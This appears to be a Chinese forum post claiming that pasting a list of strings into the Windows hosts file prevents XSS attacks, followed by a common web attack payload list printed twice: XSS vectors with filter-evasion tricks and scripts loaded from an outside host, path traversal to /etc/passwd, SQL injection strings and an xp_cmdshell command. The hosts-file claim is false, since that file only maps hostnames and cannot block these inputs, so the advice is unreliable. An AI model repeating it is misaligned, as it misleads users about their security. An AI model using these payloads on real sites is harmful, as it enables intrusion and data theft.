在windows中找到 C:\Windows\System32\drivers\etc\hosts, 然后使用记事本 文段编辑器 写字板都可以打开 打开这个文件 然后添加 下面给出的代码 理论上来讲就可以回避此类的XXS攻击了
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<img src="javascript:alert(’XSS’)">
<script>alert(/"Vulnerable/")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini
/index.html
?.jsp
?.jsp
<script>alert(’Vulnerable’);</script>
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a/
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec master..xp_cmdshell ’dir c: > c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
/../../../../../../../../windows/system.ini
’’;!--"<XSS>=&{()}
<IMG SRC="javascript:alert(’XSS’);">
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav	ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
"<IMG SRC=java/0script:alert(/"XSS/")>";’ > out
<IMG SRC=" javascript:alert(’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNSRC="javascript:alert(’XSS’)">
<IMG LOWSRC="javascript:alert(’XSS’)">
<BGSOUND SRC="javascript:alert(’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
<IMG SRC="javascript:alert(’XSS’)"
<!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=http://xss.ha.ckers.org/a.js></SCRIPT>’"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" ’’ SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=’>’" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin’--
’ or 0=0 --
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi") or ("a"="a
><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<img src="javascript:alert(’XSS’)">
<script>alert(/"Vulnerable/")</script>.jsp
"
../../../../../../../etc/passwd
../../../../../windows/win.ini
/index.html
?.jsp
?.jsp
<script>alert(’Vulnerable’);</script>
<script>alert(’Vulnerable’)</script>
?sql_debug=1
a\.aspx
a.jsp/<script>alert(’Vulnerable’)</script>
a/
a?<script>alert(’Vulnerable’)</script>
"><script>alert(’Vulnerable’)</script>
’;exec master..xp_cmdshell ’dir c: > c:/inetpub/wwwroot/?.txt’--&&
">
&
&SESSION_ID={SESSION_ID}&SESSION_ID=
1 union all select pass,0,0,0,0 from customers where fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
/../../../../../../../../windows/system.ini
’’;!--"<XSS>=&{()}
<IMG SRC="javascript:alert(’XSS’);">
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav	ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
<IMG SRC="jav
ascript:alert(’XSS’);">
"<IMG SRC=java/0script:alert(/"XSS/")>";’ > out
<IMG SRC=" javascript:alert(’XSS’);">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert(’XSS’)">
<BODY ONLOAD=alert(’XSS’)>
<IMG DYNSRC="javascript:alert(’XSS’)">
<IMG LOWSRC="javascript:alert(’XSS’)">
<BGSOUND SRC="javascript:alert(’XSS’);">
<br size="&{alert(’XSS’)}">
<LAYER SRC="/info/upimg/allimg/080417/0946110.jpg"></SCRIPT>
<IMG SRC="javascript:alert(’XSS’)"
<!--#exec cmd="/bin/echo ’<SCRIPT SRC’"--><!--#exec cmd="/bin/echo ’=http://xss.ha.ckers.org/a.js></SCRIPT>’"-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" ’’ SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=’>’" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin’--
’ or 0=0 --
" or 0=0 --
or 0=0 --
’ or 0=0 #
" or 0=0 #
or 0=0 #
’ or ’x’=’x
" or "x"="x
’) or (’x’=’x
’ or 1=1--
" or 1=1--
or 1=1--
’ or a=a--
" or "a"="a
’) or (’a’=’a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi’ or 1=1 --
hi’ or ’a’=’a
hi’) or (’a’=’a
hi") or ("a"="a
![](http://imgsrc.baidu.com/forum/pic/item/d50735fae6cd7b895e4a2b0e0f2442a7d9330e1c.jpg?v=tbs)